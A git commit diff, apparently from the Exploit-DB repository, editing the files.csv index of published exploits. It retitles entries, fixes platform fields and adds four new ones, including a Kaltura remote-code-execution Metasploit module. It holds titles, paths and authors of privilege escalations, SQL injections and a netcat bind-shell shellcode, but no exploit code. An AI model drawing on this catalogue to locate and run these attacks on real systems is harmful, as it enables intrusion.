DB: 2016-09-22
6 new exploits Setuid perl - PerlIO_Debug() Root owned file creation Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation Kaltura 11.1.0-2 - Remote Code Execution (Metasploit) Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Root Exploit Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Root Exploit (5) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Root Exploit (1) Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) VideoCache 1.9.2 - vccleaner Root VideoCache 1.9.2 - 'vccleaner' Privilege Escalation UK One Media CMS - 'id' Error Based SQL Injection UK One Media CMS - 'id' Error-Based SQL Injection xt:Commerce Gambio 2008 < 2010 - 'reviews.php' ERROR Based SQL Injection xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection Axis2 - / SAP BusinessObjects Authenticated Code Execution (via SOAP) Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP) Ultimate eShop - Error Based SQL Injection Ultimate eShop - Error-Based SQL Injection WordPress Plugin Multiple - timthumb.php Vulnerabilities Multiple WordPress Plugins - timthumb.php File Upload Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service Slackware Linux 3.5 - /etc/group missing results in Root access Slackware Linux 3.5 - /etc/group Missing Privilege Escalation Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service Sudo 1.6.3 - Unclean Environment Variable Root Program Execution Sudo 1.6.3 - Unclean Environment Variable Privilege Escalation Linux Kernel 2.0.x/2.2.x/2.4.x / FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure Microsoft Office PowerPoint 2010 - Invalid Pointer Reference Symantec rar Decomposer Engine (Multiple Products) - Out-of-Bounds Read / Out-of-Bounds Write sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURemote Code Execution Bypass sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass Microweber 0.905 - Error Based SQL Injection Microweber 0.905 - Error-Based SQL Injection WordPress Theme TimThumb 2.8.13 WebShot Plugin/ - Remote Code Execution Multiple WordPress Plugins (Using TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution
This commit is contained in:
parent
fdd9fd65e2
commit
b8ebed3824
7 changed files with 221 additions and 18 deletions
39
files.csv
39
files.csv
|
@ -615,7 +615,7 @@ id,file,description,date,author,platform,type,port
|
|||
789,platforms/linux/dos/789.c,"ngIRCd 0.8.1 - Remote Denial of Service (2)",2005-02-05,CorryL,linux,dos,6667
|
||||
790,platforms/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,cgi,webapps,0
|
||||
791,platforms/linux/local/791.c,"Setuid perl - PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0
|
||||
792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root owned file creation",2005-02-07,"Kevin Finisterre",linux,local,0
|
||||
792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0
|
||||
793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0
|
||||
794,platforms/windows/remote/794.c,"3CServer 1.1 - FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21
|
||||
795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0
|
||||
|
@ -2789,6 +2789,7 @@ id,file,description,date,author,platform,type,port
|
|||
3110,platforms/osx/dos/3110.rb,"Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos,0
|
||||
3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (.WMF) CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0
|
||||
3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0
|
||||
40404,platforms/php/remote/40404.rb,"Kaltura 11.1.0-2 - Remote Code Execution (Metasploit)",2016-09-21,"Mehmet Ince",php,remote,80
|
||||
3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - (fieldValidation.php) Remote File Inclusion",2007-01-10,irvian,php,webapps,0
|
||||
3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps,0
|
||||
3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-01-11,ajann,asp,webapps,0
|
||||
|
@ -8619,7 +8620,7 @@ id,file,description,date,author,platform,type,port
|
|||
9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - (double ext) Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0
|
||||
9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,windows,dos,0
|
||||
9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - (ata device) Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0
|
||||
9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Root Exploit",2009-07-13,nofame,linux,local,0
|
||||
9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,linux,local,0
|
||||
9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 - (ListData.dat) Universal Buffer Overflow (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0
|
||||
9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow",2009-07-13,Sberry,windows,remote,0
|
||||
9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0
|
||||
|
@ -8946,7 +8947,7 @@ id,file,description,date,author,platform,type,port
|
|||
9476,platforms/windows/local/9476.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow",2009-08-18,mr_me,windows,local,0
|
||||
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Privilege Escalation",2009-08-18,Zinx,android,local,0
|
||||
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80
|
||||
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0
|
||||
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local,0
|
||||
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0
|
||||
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0
|
||||
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Authentication Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0
|
||||
|
@ -9009,7 +9010,7 @@ id,file,description,date,author,platform,type,port
|
|||
9539,platforms/windows/dos/9539.py,"uTorrent 1.8.3 (Build 15772) - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,windows,dos,0
|
||||
9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,windows,local,0
|
||||
9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow (Windows 2000)",2009-08-31,kingcope,windows,remote,21
|
||||
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0
|
||||
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",linux,local,0
|
||||
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",linux,local,0
|
||||
9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0
|
||||
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation",2009-08-31,"Ramon Valle",linux,local,0
|
||||
|
@ -9749,7 +9750,7 @@ id,file,description,date,author,platform,type,port
|
|||
10484,platforms/windows/local/10484.txt,"Kaspersky Lab - Multiple Products Privilege Escalation",2009-12-16,"Maxim A. Kulakov",windows,local,0
|
||||
10485,platforms/php/webapps/10485.txt,"Drupal Module Sections - Cross-Site Scripting",2009-12-16,"Justin C. Klein Keane",php,webapps,0
|
||||
14034,platforms/windows/dos/14034.pl,"Wincalc 2 - '.num' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0
|
||||
10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 - vccleaner Root",2009-12-16,"Dominick LaTrappe",linux,local,0
|
||||
10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 - 'vccleaner' Privilege Escalation",2009-12-16,"Dominick LaTrappe",linux,local,0
|
||||
10488,platforms/php/webapps/10488.txt,"WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps,0
|
||||
10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local Denial of Service Buffer Overflow",2009-12-16,Connection,windows,dos,0
|
||||
10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
|
@ -12280,7 +12281,7 @@ id,file,description,date,author,platform,type,port
|
|||
13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
|
||||
13931,platforms/php/webapps/13931.txt,"KubeLance - 'profile.php?id' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
|
||||
13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0
|
||||
13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0
|
||||
13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error-Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0
|
||||
13934,platforms/windows/dos/13934.py,"MoreAmp - '.maf' Buffer Overflow (PoC)",2010-06-19,Sid3^effects,windows,dos,0
|
||||
13935,platforms/php/webapps/13935.txt,"Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0
|
||||
13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection (ladder[id])",2010-06-19,ahwak2000,php,webapps,0
|
||||
|
@ -13115,7 +13116,7 @@ id,file,description,date,author,platform,type,port
|
|||
15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint - '.bmp' Crash (PoC)",2010-09-18,andrew,windows,dos,0
|
||||
15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0
|
||||
15037,platforms/php/webapps/15037.html,"CMSimple - Cross-Site Request Forgery",2010-09-18,Abysssec,php,webapps,0
|
||||
15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' ERROR Based SQL Injection",2010-09-18,secret,php,webapps,0
|
||||
15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection",2010-09-18,secret,php,webapps,0
|
||||
15040,platforms/php/webapps/15040.txt,"Joomla! Component com_restaurantguide - Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0
|
||||
15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,php,webapps,0
|
||||
15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0
|
||||
|
@ -14123,7 +14124,7 @@ id,file,description,date,author,platform,type,port
|
|||
16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,Metasploit,multiple,remote,0
|
||||
16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0
|
||||
16314,platforms/multiple/remote/16314.rb,"Sun Java - System Web Server WebDAV OPTIONS Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0
|
||||
16315,platforms/multiple/remote/16315.rb,"Axis2 - / SAP BusinessObjects Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0
|
||||
16315,platforms/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0
|
||||
16316,platforms/multiple/remote/16316.rb,"JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)",2010-08-03,Metasploit,multiple,remote,0
|
||||
16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager Application Deployer - Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,multiple,remote,0
|
||||
16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0
|
||||
|
@ -14967,7 +14968,7 @@ id,file,description,date,author,platform,type,port
|
|||
17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injections Vulnerabilities",2011-04-22,NoNameMT,php,webapps,0
|
||||
17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0
|
||||
17190,platforms/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0
|
||||
17191,platforms/php/webapps/17191.txt,"Ultimate eShop - Error Based SQL Injection",2011-04-20,Romka,php,webapps,0
|
||||
17191,platforms/php/webapps/17191.txt,"Ultimate eShop - Error-Based SQL Injection",2011-04-20,Romka,php,webapps,0
|
||||
17192,platforms/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-20,LiquidWorm,php,webapps,0
|
||||
17193,platforms/php/webapps/17193.html,"SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-04-20,"vir0e5 ",php,webapps,0
|
||||
17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
|
@ -15533,7 +15534,7 @@ id,file,description,date,author,platform,type,port
|
|||
17869,platforms/php/webapps/17869.txt,"WordPress Plugin Relocate Upload 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0
|
||||
17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' command Remote Buffer Overflow",2011-09-19,mr.pr0n,windows,remote,0
|
||||
17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0
|
||||
17872,platforms/php/webapps/17872.txt,"WordPress Plugin Multiple - timthumb.php Vulnerabilities",2011-09-19,"Ben Schmidt",php,webapps,0
|
||||
17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugins - timthumb.php File Upload",2011-09-19,"Ben Schmidt",php,webapps,0
|
||||
17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0
|
||||
17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0
|
||||
17876,platforms/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0
|
||||
|
@ -16522,12 +16523,12 @@ id,file,description,date,author,platform,type,port
|
|||
19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - TelnetD",1999-01-02,"Tomas Halgas",windows,remote,23
|
||||
19386,platforms/php/webapps/19386.txt,"UCCASS 1.8.1 - Blind SQL Injection",2012-06-24,dun,php,webapps,0
|
||||
19385,platforms/windows/dos/19385.txt,"Irfanview 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0
|
||||
19117,platforms/linux/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",linux,dos,0
|
||||
19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0
|
||||
19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",multiple,remote,0
|
||||
19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Exploit",1998-07-06,"RSI Advise",linux,remote,0
|
||||
19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 - Handling of ISINDEX Query",1998-07-06,"Luz Pinto",multiple,remote,0
|
||||
19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 - Exploit",1998-07-08,"Albert Nubdy",multiple,remote,0
|
||||
19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - /etc/group missing results in Root access",1998-07-13,"Richard Thomas",linux,local,0
|
||||
19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - /etc/group Missing Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0
|
||||
19123,platforms/linux/remote/19123.c,"SCO Open Server 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",linux,remote,0
|
||||
19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink",1998-07-15,emffmmadffsdf,linux,remote,0
|
||||
19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0
|
||||
|
@ -16795,7 +16796,7 @@ id,file,description,date,author,platform,type,port
|
|||
19420,platforms/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)",1999-07-13,"Last Stage of Delirium",multiple,remote,0
|
||||
19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)",1999-07-13,jGgM,multiple,remote,0
|
||||
19422,platforms/linux/local/19422.txt,"BMC Software Patrol 3.2.5 - Patrol SNMP Agent File Creation/Permission",1999-07-14,"Andrew Alness",linux,local,0
|
||||
19423,platforms/multiple/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",multiple,dos,0
|
||||
19423,platforms/bsd/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0
|
||||
19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (1)",1999-07-19,"rain forest puppy",windows,remote,0
|
||||
19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0
|
||||
19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0 / SGI IRIX 6.5.4 / SGI UNICOS 10.0 6 - arrayd.auth Default Configuration",1999-07-19,"Last Stage of Delirium",multiple,remote,0
|
||||
|
@ -18516,7 +18517,7 @@ id,file,description,date,author,platform,type,port
|
|||
21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,lin_x86-64,dos,0
|
||||
21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows - Long Request Buffer Overflow",2002-01-14,aT4r,windows,remote,0
|
||||
21226,platforms/linux/local/21226.c,"IMLib2 - Home Environment Variable Buffer Overflow",2002-01-13,"Charles Stevenson",linux,local,0
|
||||
21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Root Program Execution",2002-01-14,"Charles Stevenson",linux,local,0
|
||||
21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Privilege Escalation",2002-01-14,"Charles Stevenson",linux,local,0
|
||||
21228,platforms/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service",2002-02-06,"Tamer Sahin",windows,dos,0
|
||||
21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow",2002-01-16,"SuSE Security",linux,local,0
|
||||
21230,platforms/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Inclusion",2002-01-16,"Handle Nopman",php,webapps,0
|
||||
|
@ -19399,7 +19400,7 @@ id,file,description,date,author,platform,type,port
|
|||
22128,platforms/linux/local/22128.c,"H-Sphere Webshell 2.4 - Privilege Escalation",2003-01-06,"Carl Livitt",linux,local,0
|
||||
22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote Root Exploit",2003-01-06,"Carl Livitt",linux,remote,0
|
||||
22130,platforms/multiple/remote/22130.txt,"AN HTTPD 1.41 e - Cross-Site Scripting",2003-01-06,D4rkGr3y,multiple,remote,0
|
||||
22131,platforms/unix/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x / FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",unix,remote,0
|
||||
22131,platforms/bsd/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",bsd,remote,0
|
||||
22132,platforms/windows/dos/22132.txt,"Microsoft Windows XP/2000 - Fontview Denial of Service",2003-01-06,andrew,windows,dos,0
|
||||
22133,platforms/php/webapps/22133.txt,"myPHPNuke 1.8.8 - Default_Theme Cross-Site Scripting",2003-01-06,Mindwarper,php,webapps,0
|
||||
22134,platforms/php/webapps/22134.txt,"S8Forum 3.0 - Remote Command Execution",2003-01-06,nmsh_sa,php,webapps,0
|
||||
|
@ -20240,6 +20241,7 @@ id,file,description,date,author,platform,type,port
|
|||
22980,platforms/windows/local/22980.asm,"Symantec Norton AntiVirus 2002/2003 - Device Driver Memory Overwrite",2003-08-02,"Lord Yup",windows,local,0
|
||||
22981,platforms/linux/dos/22981.c,"Postfix 1.1.x - Denial of Service (1)",2003-08-04,r3b00t,linux,dos,0
|
||||
22982,platforms/linux/dos/22982.pl,"Postfix 1.1.x - Denial of Service (2)",2003-08-04,daniels@legend.co.uk,linux,dos,0
|
||||
40406,platforms/windows/dos/40406.txt,"Microsoft Office PowerPoint 2010 - Invalid Pointer Reference",2016-09-21,"Google Security Research",windows,dos,0
|
||||
22983,platforms/hardware/dos/22983.txt,"HP Compaq Insight Management Agent 5.0 - Format String",2003-08-04,mcw@wcd.se,hardware,dos,0
|
||||
22984,platforms/linux/local/22984.c,"Xtokkaetama 1.0 b-6 - Nickname Local Buffer Overflow (1)",2003-08-04,V9,linux,local,0
|
||||
22985,platforms/linux/local/22985.c,"Xtokkaetama 1.0 b-6 - Nickname Local Buffer Overflow (2)",2003-08-04,techieone@softhome.net,linux,local,0
|
||||
|
@ -20269,6 +20271,7 @@ id,file,description,date,author,platform,type,port
|
|||
23021,platforms/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 - Search Cross-Site Scripting",2003-08-12,"Donnie Werner",cgi,webapps,0
|
||||
23022,platforms/php/local/23022.c,"PHP 4.x - DLOpen Memory Disclosure (1)",2003-08-13,"Andrew Griffiths",php,local,0
|
||||
23023,platforms/php/local/23023.c,"PHP 4.x - DLOpen Memory Disclosure (2)",2003-08-13,andrewg,php,local,0
|
||||
40405,platforms/multiple/dos/40405.txt,"Symantec rar Decomposer Engine (Multiple Products) - Out-of-Bounds Read / Out-of-Bounds Write",2016-09-21,"Google Security Research",multiple,dos,0
|
||||
23024,platforms/multiple/remote/23024.txt,"SurgeLDAP 1.0 d - Full Path Disclosure",2003-08-13,"Ziv Kamir",multiple,remote,0
|
||||
23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - User.cgi Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0
|
||||
23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0
|
||||
|
@ -22303,7 +22306,7 @@ id,file,description,date,author,platform,type,port
|
|||
25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0
|
||||
25132,platforms/multiple/remote/25132.txt,"Bontago Game Server 1.1 - Remote Nickname Buffer Overrun",2005-02-21,"Luigi Auriemma",multiple,remote,0
|
||||
25133,platforms/multiple/remote/25133.txt,"xinkaa Web station 1.0.3 - Directory Traversal",2005-02-21,"Luigi Auriemma",multiple,remote,0
|
||||
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURemote Code Execution Bypass",2013-05-01,aeon,linux,local,0
|
||||
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0
|
||||
25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) Cross-Site Scripting",2013-05-01,demonalex,windows,dos,0
|
||||
25136,platforms/php/remote/25136.rb,"phpMyAdmin - Authenticated Remote Code Execution via preg_replace()",2013-05-01,Metasploit,php,remote,0
|
||||
25137,platforms/php/remote/25137.rb,"WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)",2013-05-01,Metasploit,php,remote,0
|
||||
|
@ -26431,7 +26434,7 @@ id,file,description,date,author,platform,type,port
|
|||
29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0
|
||||
29387,platforms/windows/dos/29387.pl,"Plogue Sforzando 1.665 - Buffer Overflow (SEH) (PoC)",2013-11-03,"Mike Czumak",windows,dos,0
|
||||
